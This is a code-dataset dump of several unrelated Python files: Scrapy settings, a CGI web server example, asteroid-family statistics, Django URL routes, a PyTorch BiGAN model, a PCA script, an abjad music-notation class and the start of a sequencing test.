http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n# SPIDER_MIDDLEWARES = {\n# 'yp.middlewares.MyCustomSpiderMiddleware': 543,\n# }\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# DOWNLOADER_MIDDLEWARES = {\n# 'yp.middlewares.MyCustomDownloaderMiddleware': 543,\n# }\n\n# Enable or disable extensions\n# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html\n# EXTENSIONS = {\n# 'scrapy.telnet.TelnetConsole': None,\n# }\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See http://doc.scrapy.org/en/latest/topics/autothrottle.html\n# NOTE: AutoThrottle will honour the standard settings for concurrency and delay\n# AUTOTHROTTLE_ENABLED=True\n# The initial download delay\n# AUTOTHROTTLE_START_DELAY=5\n# The maximum download delay to be set in case of high latencies\n# AUTOTHROTTLE_MAX_DELAY=60\n# Enable showing throttling stats for every response received:\n# AUTOTHROTTLE_DEBUG=False\n\n# Enable and configure HTTP caching (disabled by default)\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n# HTTPCACHE_ENABLED=True\n# HTTPCACHE_EXPIRATION_SECS=0\n# HTTPCACHE_DIR='httpcache'\n# HTTPCACHE_IGNORE_HTTP_CODES=[]\n# HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'\n","sub_path":"yp/yp/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"302428852","text":"\"\"\"\nРеализация веб-сервера на языке Python, способная запускать\nсерверные CGI-сценарии на языке Python; обслуживает файлы и\nсценарии в текущем рабочем каталоге; сценарии на языке Python\nдолжны находиться в каталоге webdir\\cgi-bin или webdir\\htbin\n\"\"\"\n\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\nimport os\n\n\nwebdir = '.' # расположение html-файлов и каталога сценариев cgi-bin\nport = 8080 # по умолчанию http://localhost/,\n# иначе использовать http://localhost:xxxx/\nos.chdir(webdir) # запуск из корневой директории HTML\nsrvraddr = '', port # имя хоста и номер порта\nsrvrobj = HTTPServer(srvraddr, CGIHTTPRequestHandler)\nsrvrobj.serve_forever() # запустить как бесконечный фоновый процесс\n","sub_path":"Examples/Preview/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"584693623","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Filename: astfam.py\n# author: Pedro Henrique A. Hasselmann\n# date: August 2012\n\n# Escrevendo em python3 e usando python2.6:\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n\nfrom os import path\n\nhome = path.expanduser(\"~\")\n\nclass AsteroidFamilyStats:\n __version__ = 0.9\n\n '''\n Statistical Work with Asteroid Families.\n Magnitude and albedo taken from Nervorny Asteroid Families (PDS Dataset).\n Taxonomic Classifications are taken from Carvano et al. (2010).\n Geometric albedos are from preliminary data provided by NEOWISE.\n '''\n##################################### INITIALIZATION\n def __init__(self,famfile=\"101_vesta\"):\n\n self.paths = list()\n\n \n self.paths.append(path.join(home,\"Projetos\",\"Taxonomia SDSS\",\"PDS Archiving\",\"\"))\n self.paths.append(path.join(home,\"Dados\",\"Catalogos\",\"\"))\n \n #print(\"initialization.....OK.\")\n\n##################################### LOAD MEMBERS AND MAGNITUDE\n import zipfile\n\n '''\n Load Nesvorny families from a zipped file.\n Make a dictionay of magnitudes of each member.\n '''\n\n # open Nesvorny Families:\n with zipfile.ZipFile(self.paths[-1]+\"NESVORNY_FAMILIES_V2_0.zip\", \"r\") as nesvorny_fam:\n fam = nesvorny_fam.open(os.path.join(\"EAR_A_VARGBDET_5_NESVORNYFAM_V2_0\",\"data\",\"families\",\"\")+famfile+\".tab\").readlines()\n members = [ID[7:13].strip() if int(ID[7:13]) != 0 else ID[14:24].strip() for ID in fam]\n magnitudes = [float(mag[53:58]) for mag in fam]\n #nesvorny_fam.printdir()\n \n print(\"Asteroid Family size:\", len(members))\n \n #setting in self:\n self.mag_fam = dict(zip(members,magnitudes))\n\n del fam, members, magnitudes\n\n # Open Asteroid Albedos:\n #wise_alb = open(sys.path[-1]+\"WISE_MBA_Pass1_2011.dat\", \"r\")\n\n##################################### LOAD CARVANO Classification:\n def LoadMOC(self):\n import zipfile\n from collections import Counter\n\n '''\n Load informations of member's observations from the SDSSMOC.\n '''\n\n with zipfile.ZipFile(self.paths[-1]+\"SDSSMOC4_ID_V2.zip\", \"r\") as sdss:\n obs = sdss.open(\"ADR4_ident2.dat\",\"r\")\n \n look_members = Counter(dict.keys(self.mag_fam))\n \n sdss_code=dict(); phase=dict()\n \n for entry in obs:\n if look_members[entry[244:251].strip()] == 1 or look_members[entry[252:272].strip()] == 1: \n phase[entry[:6]] = float(entry[334:339])\n \n if entry[244:251].strip() != '0':\n sdss_code[entry[:6]] = str(entry[244:251]).strip()\n else:\n sdss_code[entry[:6]] = str(entry[252:272]).strip()\n \n look_members = Counter(dict.values(sdss_code))\n\n # setting in self:\n self.sdss_code = sdss_code\n self.phase_fam = phase\n\n##################################### LOAD CARVANO Classification:\n def LoadTax(self):\n from collections import Counter \n \n '''\n Make a dictionary of members with taxonomic classification by Carvano et al. (2010).\n '''\n\n carvano = open(self.paths[-2]+\"SDSStax_ast_table.tab\")\n\n look_members = Counter(dict.keys(self.mag_fam))\n\n # Correlate asteroid ID and classification:\n tax_fam = dict()\n for entry in carvano:\n if look_members[entry[:6].strip()] == 1 or look_members[entry[24:35].strip()] == 1:\n if int(entry[:6]) != 0: \n tax_fam[entry[:6].strip()] = entry[36:38].strip()\n else:\n tax_fam[entry[24:35].strip()] = entry[36:38].strip()\n\n print(\"Family Members with SDSS classification:\", len(dict.keys(tax_fam)))\n \n del carvano\n \n # setting in self:\n self.tax_fam = tax_fam\n \n##################################### LOAD WISE Albedos and Diameter\n def LoadWISE(self):\n from numpy import genfromtxt\n from collections import Counter\n from math import isnan\n from packdesig import convert_design\n '''\n Make a dictionary of members with albedo and diameters.\n '''\n wise = map(list,genfromtxt(self.paths[-1]+\"WISE_MBA_Pass1_2011.dat\", dtype=None, skiprows=23))\n \n look_members = Counter(dict.keys(self.mag_fam))\n \n alb_fam = dict(); diam_fam= dict()\n n = 1\n for entry in wise:\n\n try:\n des = convert_design(entry[0].lstrip('0'))\n except IndexError:\n des = entry[0].lstrip('0')\n \n if look_members[des] == 1 and isnan(entry[1]) == False and isnan(entry[5]) == False:\n\n if alb_fam.has_key(des) == True:\n n+=1\n prev = des\n alb_fam[des] = alb_fam.get(des) + float(entry[5])\n diam_fam[des] = diam_fam.get(des) + float(entry[3])\n else:\n try:\n alb_fam[prev] = alb_fam.get(prev)/float(n)\n diam_fam[prev] = diam_fam.get(prev)/float(n)\n #print(prev,alb_fam.get(prev),n)\n except UnboundLocalError:\n pass\n\n alb_fam[des] = round(entry[5], 4)\n diam_fam[des] = round(entry[3], 4)\n\n n = 1\n\n alb_fam[prev] = alb_fam.get(prev)/float(n)\n diam_fam[prev] = diam_fam.get(prev)/float(n)\n\n print(\"Family Members with WISE albedo: \",len(dict.keys(alb_fam)))\n #print(alb_fam)\n del wise, entry\n\n # setting in self:\n self.alb_fam = alb_fam\n self.diam_fam = diam_fam \n\n##################################### Split In taxonomic classification\n def SplitInTax(self,par='magnitude',*taxs):\n from scipy.stats import gaussian_kde\n from collections import deque\n '''\n Split the physical parameters of family members in N groups of taxonomic classification.\n Choose the parameter that will be splitted.\n Choose the taxonomic groups according to Carvano et al. (2010).\n '''\n\n if par == 'magnitude': phys_par = self.mag_fam\n if par == 'albedo': phys_par = self.alb_fam\n if par == 'diameter': phys_par = self.diam_fam\n\n tax_fam = self.tax_fam\n alb_fam = self.alb_fam\n\n self.split =[deque() for n in xrange(len(taxs))]\n self.split_gkde =[list() for n in xrange(len(taxs))]\n\n for ast in dict.keys(tax_fam):\n for n, tax in enumerate(taxs):\n if tax_fam[ast] == tax and alb_fam.has_key(ast) == True:\n try:\n self.split[n].append(phys_par[ast])\n except KeyError:\n pass\n\n # gaussian density distribution\n #xmin = min(dict.values(phys_par))\n #xmax = max(dict.values(phys_par))\n for n, tax in enumerate(taxs):\n self.split[n] = list(self.split[n])\n print(tax+'-types: ',len(self.split[n]))\n self.split_gkde[n] = gaussian_kde(self.split[n])\n \n # setting in self:\n self.taxs = taxs\n self.par = par\n\n\n##################################### PLOT DISTRIBUTIONS\n def Plot(self,xmin=10,xmax=20,bins=80,lbl='Vestian'):\n import matplotlib.pyplot as plt\n from numpy import linspace\n \n '''\n Plot frequency distribution of a parameter of n taxonomic groups.\n '''\n\n try:\n self.taxs\n except NameError:\n print('Reload the SplitInTax() attribute.')\n\n x = linspace(xmin,xmax,bins)\n\n plt.figure(1,figsize=(10,8),dpi=70)\n \n [plt.plot(x,dist.evaluate(x),label=lbl+\" \"+self.taxs[n]+\"-types\") for n, dist in enumerate(self.split_gkde)]\n [plt.hist(dist,range=(xmin,xmax),normed=True,histtype='step',label=lbl+\" \"+self.taxs[n]+\"-types\") for n, dist in enumerate(self.split)]\n \n if self.par == 'magnitude': plt.xlabel(\"Absolute Magnitude\")\n if self.par == 'albedo': plt.xlabel(\"Geometric Albedo\")\n if self.par == 'diameter': plt.xlabel(\"Diameter\")\n\n plt.ylabel(\"$f$\")\n plt.legend()\n\n plt.show()\n\n##################################### TWO-SAMPLE KS-TEST\n def KStest2(self,tax1,tax2):\n from scipy.stats import ks_2samp\n \n try:\n self.taxs\n except NameError:\n print('Reload the SplitInTax() attribute.')\n \n n1 = self.taxs.index(tax1)\n n2 = self.taxs.index(tax2)\n \n print('Two-Sample KS test: ',ks_2samp(self.split[n1],self.split[n2]))\n\n##################################### SANITY TEST\n def Sanity(self,tax,per=0.2):\n from scipy.stats import ks_2samp\n import random as rd\n \n '''\n Testing the sanity of the two-sample KS test.\n '''\n \n test=list()\n test.extend(self.split[self.taxs.index(tax)])\n total = len(test)\n \n l=[[],[]]\n \n # Randomly sorting 20% of a previous splitted list.\n for n in [0,1]:\n i=0\n while i <= per*total:\n \n x = rd.choice(test)\n l[n].append(x)\n test.remove(x)\n \n i +=1\n\n print(len(test),len(l[0]),len(l[1]))\n print('Sanity Two-Sample KS test: ',ks_2samp(l[0],l[1]))\n\n\n\n# END\n","sub_path":"astfam.py","file_name":"astfam.py","file_ext":"py","file_size_in_byte":8609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"393099354","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),#wyszukiwanie pustego wyrazenia regularnego.Znak ^ to poczatek stringu, a $ koniec\n url(r'^topics/', views.topics, name='topics'),\n url(r'^topic/(?P\\d)', views.topic, name='topic'),\n url(r'^content/(?P\\d)', views.entry_content, name='entry_content'),\n url(r'^new_topic/', views.new_topic, name='new_topic'),\n url(r'^new_entry/(?P\\d+)', views.new_entry, name='new_entry'),\n url(r'^edit_entry/(?P\\d+)', views.edit_entry, name='edit_entry'),\n]","sub_path":"learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"640501771","text":"import torch\nimport torch.nn as nn\n\n\ndef make_Encoder(input_size, z_dim, channel, nef, n_extra_layer=0):\n \"\"\"\n BiGAN Encoder network\n\n input_size : the image size of the data\n z_dim : the dimention of the latent space\n channel : the number of channels of the data\n nef : the number of filters in encoder\n \"\"\"\n assert input_size % 16 == 0, \"input size has to be a multiple of 16\"\n\n main = nn.Sequential()\n\n cnef, tisize = nef, 8\n while tisize != input_size:\n cnef = cnef // 2\n tisize = tisize * 2\n\n main.add_module(\n \"initial_Conv-{}-{}\".format(channel, cnef),\n nn.Conv2d(channel, cnef, kernel_size=3, stride=1, padding=1, bias=False),\n )\n # the number of stride is the default setting of tf\n # output size is the same as input_size\n main.add_module(\"initial_LeakyRU-{}\".format(cnef), nn.LeakyReLU(0.1, inplace=True))\n csize = input_size\n\n while csize > 8:\n # official kernel_size is 3 but changed to 4\n main.add_module(\n \"pyramid_Conv-{}-{}\".format(cnef, cnef * 2),\n nn.Conv2d(cnef, cnef * 2, kernel_size=4, stride=2, padding=1, bias=False),\n )\n main.add_module(\n \"pyramid_BatchNorm-{}\".format(cnef * 2), nn.BatchNorm2d(cnef * 2)\n )\n main.add_module(\n \"pyramid_LeakyReLU-{}\".format(cnef * 2), nn.LeakyReLU(0.1, inplace=True)\n )\n csize = csize // 2\n cnef = cnef * 2\n\n for l in range(n_extra_layer):\n main.add_module(\n \"extra_Conv-{}-{}\".format(cnef, cnef),\n nn.Conv2d(cnef, cnef, kernel_size=3, stride=1, padding=1, bias=False),\n )\n main.add_module(\"extra_BatchNorm-{}\".format(cnef), nn.BatchNorm2d(cnef))\n main.add_module(\n \"extra_LeakyReLU-{}\".format(cnef), nn.LeakyReLU(0.1, inplace=True)\n )\n\n main.add_module(\n \"last_linear-{}-{}\".format(cnef * 8 * 8, z_dim), nn.Linear(cnef * 8 * 8, z_dim),\n )\n\n return main\n\n\nclass NetE(nn.Module):\n \"\"\"\n the network of Encoder\n \"\"\"\n\n def __init__(self, CONFIG):\n super(NetE, self).__init__()\n\n model = make_Encoder(\n CONFIG.input_size, CONFIG.z_dim, CONFIG.channel, CONFIG.nef\n )\n layers = list(model.children())\n\n self.pyramid = nn.Sequential(*layers[:-1])\n self.linear = nn.Sequential(layers[-1])\n\n def forward(self, x, CONFIG):\n out = self.pyramid(x)\n out = out.view(-1, CONFIG.nef * 8 * 8) # change to the one dimentional vector\n out = self.linear(out)\n\n return out\n\n\ndef make_Generator(input_size, z_dim, channel, ngf, n_extra_layer=0):\n \"\"\"\n BiGAN Generator network\n\n input_size : the image size of the data\n z_dim : the dimention of the latent space\n channel : the number of channels of the image\n ngf : the number of Generator's filter\n \"\"\"\n assert input_size % 16 == 0, \"input size has to be a multiple of 16\"\n\n main = nn.Sequential()\n\n main.add_module(\n \"initial_Linear-{}-{}\".format(z_dim, 1024), nn.Linear(z_dim, 1024, bias=False),\n )\n main.add_module(\"initial_BatchNorm-{}\".format(1024), nn.BatchNorm1d(1024))\n main.add_module(\"initial_ReLU-{}\".format(1024), nn.ReLU(inplace=True))\n\n main.add_module(\n \"second_Linear-{}-{}\".format(1024, ngf * 8 * 8),\n nn.Linear(1024, ngf * 8 * 8, bias=False),\n )\n main.add_module(\n \"second_BatchNorm-{}\".format(ngf * 8 * 8), nn.BatchNorm1d(ngf * 8 * 8)\n )\n main.add_module(\"second_ReLU-{}\".format(ngf * 8 * 8), nn.ReLU(inplace=True))\n csize = 8\n cngf = ngf\n\n while csize < input_size // 2:\n main.add_module(\n \"pyramid_Convt-{}-{}\".format(cngf, cngf // 2),\n nn.ConvTranspose2d(\n cngf, cngf // 2, kernel_size=4, stride=2, padding=1, bias=False\n ),\n )\n main.add_module(\n \"pyramid_BatchNorm-{}\".format(cngf // 2), nn.BatchNorm2d(cngf // 2)\n )\n main.add_module(\"pyramid_ReLU-{}\".format(cngf // 2), nn.ReLU(inplace=True))\n cngf = cngf // 2\n csize = csize * 2\n\n for l in range(n_extra_layer):\n main.add_module(\n \"extra_Convt-{}-{}\".format(cngf, cngf),\n nn.ConvTranspose2d(\n cngf, cngf, kernel_size=3, stride=1, padding=1, bias=False\n ),\n )\n main.add_module(\"extra_BatchNorm-{}\".format(cngf), nn.BatchNorm2d(cngf))\n main.add_module(\"extra_ReLU-{}\".format(cngf), nn.ReLU(inplace=True))\n\n main.add_module(\n \"last_Convt-{}-{}\".format(cngf, channel),\n nn.ConvTranspose2d(\n cngf, channel, kernel_size=4, stride=2, padding=1, bias=False\n ),\n )\n main.add_module(\"last_Tanh-{}\".format(channel), nn.Tanh())\n\n return main\n\n\nclass NetG(nn.Module):\n \"\"\"\n the network of Generator\n \"\"\"\n\n def __init__(self, CONFIG):\n super(NetG, self).__init__()\n\n model = make_Generator(\n CONFIG.input_size, CONFIG.z_dim, CONFIG.channel, CONFIG.ngf\n )\n layers = list(model.children())\n\n self.linear = nn.Sequential(*layers[:6])\n self.pyramid = nn.Sequential(*layers[6:])\n\n def forward(self, z, CONFIG):\n out = self.linear(z)\n out = out.view(\n z.shape[0], CONFIG.ngf, 8, 8\n ) # (batch size, channel, height, width)\n out = self.pyramid(out)\n\n return out\n\n\ndef make_Discriminator(input_size, z_dim, channel, ndf, n_extra_layer=0):\n \"\"\"\n BiGAN Discriminator network\n\n input_size : the image size of the data\n z_dim : the dimention of the latent space\n channel : the number of channels of the image\n ndf : the number of Generator's filter\n \"\"\"\n assert input_size % 16 == 0, \"input_size has to be a multiple of 16\"\n\n cndf, tisize = ndf * 2, 16\n while tisize != input_size:\n cndf = cndf // 2\n tisize = tisize * 2\n\n # D(x)\n D_x = nn.Sequential()\n\n D_x.add_module(\n \"initial_Conv-{}-{}\".format(channel, cndf),\n nn.Conv2d(channel, cndf, kernel_size=4, stride=2, padding=1, bias=False),\n )\n D_x.add_module(\"initial_LeakyReLU-{}\".format(cndf), nn.LeakyReLU(0.1, inplace=True))\n D_x.add_module(\"initial_Dropout-{}\".format(cndf), nn.Dropout(inplace=True))\n csize = input_size // 2\n\n while csize > 16:\n D_x.add_module(\n \"pyramid_Conv-{}-{}\".format(cndf, cndf * 2),\n nn.Conv2d(cndf, cndf * 2, kernel_size=4, stride=2, padding=1, bias=False),\n )\n D_x.add_module(\n \"pyramid_LeakyReLU-{}\".format(cndf * 2), nn.LeakyReLU(0.1, inplace=True),\n )\n D_x.add_module(\"pyramid_Dropout-{}\".format(cndf * 2), nn.Dropout(inplace=True))\n csize = csize // 2\n cndf = cndf * 2\n\n for l in range(n_extra_layer):\n D_x.add_module(\n \"extra_Conv-{}-{}\".format(cndf, cndf),\n nn.Conv2d(cndf, cndf, kernel_size=3, stride=1, padding=1, bias=False),\n )\n D_x.add_module(\n \"extra_LeakyReLU-{}\".format(cndf), nn.LeakyReLU(0.1, inplace=True)\n )\n D_x.add_module(\"extra_Dropout-{}\".format(cndf), nn.Dropout(inplace=True))\n\n D_x.add_module(\n \"last_Conv-{}-{}\".format(cndf, cndf),\n nn.Conv2d(cndf, cndf, kernel_size=4, stride=2, padding=1, bias=False),\n )\n D_x.add_module(\"last_LeakyReLU-{}\".format(cndf), nn.LeakyReLU(0.1, inplace=True))\n D_x.add_module(\"pyramid_Dropout-{}\".format(cndf), nn.Dropout(inplace=True))\n\n # D(z)\n D_z = nn.Sequential()\n\n D_z.add_module(\"z_Linear\", nn.Linear(z_dim, 512))\n D_z.add_module(\"z_LeakyReLU\", nn.LeakyReLU(0.1, inplace=True))\n D_z.add_module(\"z_Dropout\", nn.Dropout(inplace=True))\n\n # D(x,z)\n D_xz = nn.Sequential()\n D_xz.add_module(\n \"concat_Linear-{}-{}\".format(512 + cndf * 8 * 8, 1024),\n nn.Linear(512 + cndf * 8 * 8, 1024),\n )\n D_xz.add_module(\"concat_LeakyReLU-{}\".format(1024), nn.LeakyReLU(0.1, inplace=True))\n D_xz.add_module(\"concat_Dropout-{}\".format(1024), nn.Dropout(inplace=True))\n D_xz.add_module(\"last_Linear-{}-{}\".format(1024, 1), nn.Linear(1024, 1))\n\n return D_x, D_z, D_xz\n\n\nclass NetD(nn.Module):\n \"\"\"\n the network of Discriminator\n \"\"\"\n\n def __init__(self, CONFIG):\n super(NetD, self).__init__()\n D_x, D_z, D_xz = make_Discriminator(\n CONFIG.input_size, CONFIG.z_dim, CONFIG.channel, CONFIG.ndf\n )\n # D(x)\n layer_x = list(D_x.children())\n self.layer_x = nn.Sequential(*layer_x)\n # D(z)\n layer_z = list(D_z.children())\n self.layer_z = nn.Sequential(*layer_z)\n # D(x,z)\n layer = list(D_xz.children())\n self.feature = nn.Sequential(*layer[:-1])\n self.classifier = nn.Sequential(layer[-1])\n\n def forward(self, x, z, CONFIG):\n x_out = self.layer_x(x)\n x_out = x_out.view(-1, CONFIG.ndf * 8 * 8)\n\n z_out = self.layer_z(z)\n\n y = torch.cat([x_out, z_out], dim=1)\n out = self.feature(y)\n\n feature = out\n feature = feature.view(feature.size()[0], -1)\n\n out = self.classifier(out)\n\n return out, feature\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"637469289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 14 10:52:51 2017\n\n@author: ansh\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport tools\n\nfrom scipy.io import loadmat\n\ndata = loadmat(\"/home/ansh/bash4/CourseraMLTutorials/exercise 7/ex7data1.mat\")\n\nX = data['X']\n\nX[:,0] = tools.meanNormalization(X[:,0])\nX[:,1] = tools.meanNormalization(X[:,1])\n\nX[:,0] = tools.featureScaling(X[:,0])\nX[:,1] = tools.featureScaling(X[:,1])\n\n\nm,n = X.shape\n\nsigma = (1/m) * np.matmul(X.T, X)\nU, S, V = np.linalg.svd(sigma)\nk = 1\nU_reduced = U[:, 0:k] #(nxk)\n\nZ = np.matmul(X, U_reduced) # (mxn) x (nxk) = (mxk)\n\nX_approx = np.matmul(Z, U_reduced.T)\n\nplt.figure(1)\nplt.scatter(X[:,0], X[:,1], c = 'b', s = 5)\nplt.scatter(X_approx[:,0], X_approx[:,1], c = 'r', s = 5)\n","sub_path":"exercise 7/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"358256752","text":"# -*- encoding: utf-8 -*-\nimport copy\nfrom abjad.tools import scoretools\nfrom abjad.tools import containertools\nfrom abjad.tools import durationtools\nfrom abjad.tools import iterationtools\nfrom abjad.tools import leaftools\nfrom abjad.tools import measuretools\nfrom abjad.tools import scoretools\nfrom abjad.tools import selectiontools\nfrom abjad.tools import timerelationtools\nfrom abjad.tools import timespantools\nfrom abjad.tools import tuplettools\nfrom abjad.tools.mutationtools import inspect\nfrom experimental.tools.musicexpressiontools.CounttimeComponentSelectExpressionSetMethodMixin \\\n import CounttimeComponentSelectExpressionSetMethodMixin\nfrom experimental.tools.musicexpressiontools.SelectExpression \\\n import SelectExpression\n\n\n# TODO: move mixin to rightmost spot in class creation\nclass CounttimeComponentSelectExpression(\n CounttimeComponentSelectExpressionSetMethodMixin, SelectExpression):\n r'''Counttime component select expression.\n\n Preparatory definitions:\n\n ::\n\n >>> score_template = \\\n ... scoretemplatetools.GroupedRhythmicStavesScoreTemplate(\n ... staff_count=4)\n >>> score_specification = \\\n ... musicexpressiontools.ScoreSpecificationInterface(\n ... score_template=score_template)\n >>> red_segment = score_specification.append_segment(name='red')\n\n Example 1. Select voice ``1`` leaves that start during score:\n\n ::\n\n >>> select_expression = score_specification.select_leaves('Voice 1')\n\n ::\n\n >>> print select_expression.storage_format\n musicexpressiontools.CounttimeComponentSelectExpression(\n classes=musicexpressiontools.ClassInventory([\n leaftools.Leaf\n ]),\n voice_name='Voice 1'\n )\n\n Example 2. Select voice ``1`` leaves that start during segment ``'red'``:\n\n ::\n\n >>> select_expression = red_segment.select_leaves('Voice 1')\n\n ::\n\n >>> print select_expression.storage_format\n musicexpressiontools.CounttimeComponentSelectExpression(\n anchor='red',\n classes=musicexpressiontools.ClassInventory([\n leaftools.Leaf\n ]),\n voice_name='Voice 1'\n )\n\n Counttime component select expressions are immutable.\n '''\n\n ### INITIALIZER ###\n\n def __init__(\n self, \n anchor=None, \n classes=None, \n voice_name=None, \n time_relation=None, \n callbacks=None,\n ):\n from experimental.tools import musicexpressiontools\n assert classes is None or \\\n self._is_counttime_component_class_expr(classes), repr(classes)\n SelectExpression.__init__(\n self,\n anchor=anchor,\n voice_name=voice_name,\n time_relation=time_relation,\n callbacks=callbacks,\n )\n CounttimeComponentSelectExpressionSetMethodMixin.__init__(self)\n if isinstance(classes, tuple):\n classes = musicexpressiontools.ClassInventory(classes)\n self._classes = classes\n\n ### SPECIAL METHODS ###\n\n def __add__(self, select_expression):\n from experimental.tools import musicexpressiontools\n assert isinstance(select_expression, type(self))\n assert self.score_specification is \\\n select_expression.score_specification\n select_expression_inventory = \\\n musicexpressiontools.SelectExpressionInventory()\n select_expression_inventory.extend(\n [copy.deepcopy(self), copy.deepcopy(select_expression)])\n select_expression_inventory._score_specification = \\\n self.score_specification\n return select_expression_inventory\n\n ### PRIVATE METHODS ###\n\n def _is_counttime_component_class_expr(self, expr):\n from experimental.tools import musicexpressiontools\n if isinstance(expr, tuple) and all(\n self._is_counttime_component_class_expr(x) for x in expr):\n return True\n elif isinstance(expr, musicexpressiontools.ClassInventory):\n return True\n elif issubclass(expr, (\n measuretools.Measure, tuplettools.Tuplet, leaftools.Leaf)):\n return True\n elif expr == containertools.Container:\n return True\n else:\n return False\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def classes(self):\n r'''Counttime component select expression classes.\n\n Returns class inventory or none.\n '''\n return self._classes\n\n ### PUBLIC METHODS ###\n\n def evaluate(self):\n r'''Evaluate counttime component select expression.\n\n Returns none when nonevaluable.\n\n Returns start-positioned rhythm payload expression when evaluable.\n '''\n from experimental.tools import musicexpressiontools\n anchor_timespan = self._evaluate_anchor_timespan()\n voice_proxy = \\\n self.score_specification.voice_data_structures_by_voice[\n self.voice_name]\n rhythm_payload_expressions = \\\n voice_proxy.payload_expressions_by_attribute['rhythm']\n # TODO: will this have to be optimized with bisect?\n rhythm_payload_expressions = \\\n rhythm_payload_expressions.get_timespans_that_satisfy_time_relation(\n timerelationtools.timespan_2_intersects_timespan_1(\n timespan_1=anchor_timespan))\n if not rhythm_payload_expressions:\n return\n rhythm_payload_expressions = \\\n copy.deepcopy(rhythm_payload_expressions)\n rhythm_payload_expressions = \\\n timespantools.TimespanInventory(rhythm_payload_expressions)\n rhythm_payload_expressions.sort()\n assert anchor_timespan.is_well_formed, repr(anchor_timespan)\n rhythm_payload_expressions &= anchor_timespan\n expression = \\\n musicexpressiontools.StartPositionedRhythmPayloadExpression(\n start_offset=anchor_timespan.start_offset)\n for rhythm_payload_expression in rhythm_payload_expressions:\n expression.payload.extend(rhythm_payload_expression.payload)\n assert inspect(expression.payload).is_well_formed()\n # TODO: eventually make this be able to work\n #callback_cache = self.score_specification.interpreter.callback_cache\n #expression = expression.get_elements_that_satisfy_time_relation(\n # time_relation, callback_cache)\n expression = self._apply_callbacks(expression)\n expression._voice_name = self.voice_name\n return expression\n\n def evaluate_against_score(self, score):\n r'''Evaluate counttime component select expression against `score`.\n\n Returns iterable payload expression.\n '''\n from experimental.tools import musicexpressiontools\n assert isinstance(score, scoretools.Score), repr(score)\n voice = score[self.voice_name]\n anchor_timespan = self._evaluate_anchor_timespan()\n # list signals the result of a call to map_to_each()\n if isinstance(anchor_timespan, list):\n is_map_to_each = True\n else:\n is_map_to_each = False\n anchor_timespan = [anchor_timespan]\n result = []\n anchor_timespans = anchor_timespan\n for anchor_timespan in anchor_timespans:\n time_relation = self._get_time_relation(anchor_timespan)\n voice_proxy = \\\n self.score_specification.voice_data_structures_by_voice[\n self.voice_name]\n start, stop = time_relation.get_offset_indices(\n voice_proxy.leaf_start_offsets, voice_proxy.leaf_stop_offsets)\n components = voice_proxy.leaves[start:stop]\n if not components:\n continue\n expression = \\\n musicexpressiontools.IterablePayloadExpression(components)\n expression = self._apply_callbacks(expression)\n result.append(expression)\n if is_map_to_each:\n return result\n else:\n expression = result[0]\n return expression\n","sub_path":"abjad/experimental/tools/musicexpressiontools/CounttimeComponentSelectExpression.py","file_name":"CounttimeComponentSelectExpression.py","file_ext":"py","file_size_in_byte":8148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"15050064","text":"import random\nfrom collections import Counter\nfrom Bio import SeqIO\nfrom tnseq import sequence\nfrom tnseq import tnseq\nfrom tnseq import extract_barcodes\nfrom tnseq import quantify_barcodes\nimport json\nimport subprocess\nimport shlex\n\n\ndef test_quantify_load_fq_barcodes():\n in_fq_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/test100.fasta\"\n cnter = quantify_barcodes.quantify_load_fq_barcodes(in_fq_file)\n expectedCounter = Counter({'ATTGTTCTATGCCTGCC': 2, 'ATCCATCAAGCAAACGC': 2, 'CGAAAAGATATACCAAT': 2, 'TCGCGATGTAATATATA': 2,\n 'GTCACGCGCCCGCGCCA': 1, 'AGACCGATGCGTCAAGG': 1, 'GAAAGCCCGAGATCGAT': 1, 'TCGCCGAGCGATTTTTA': 1,\n 'AGGAAACCAAATATAAA': 1, 'TGCAAAGTGAGGGCTAC': 1, 'AGAGCACACGACCGGTG': 1, 'TACATCGCTAGTGAACT': 1,\n 'GTGCGCTATGCAACGAC': 1, 'TGGCACGAAAGCAAGAT': 1, 'CTGCATATCTAGCGCGG': 1, 'CCAAGAGCACGAGACCA': 1,\n 'GCGGTTCGGAGAGACAG': 1, 'ACGGATCCGACCCGGGG': 1, 'TGGAAACCCTATCGCTA': 1, 'AGATGCTCGCGTGCGGT': 1,\n 'CACATTGGAGTCTACTG': 1, 'CGCAATGGGGCGTGGGG': 1, 'CTCCCAGCTTATCAGAG': 1, 'GACCAATACGCGGGGAG': 1,\n 'CCGTCTGGCTGAGACTG': 1, 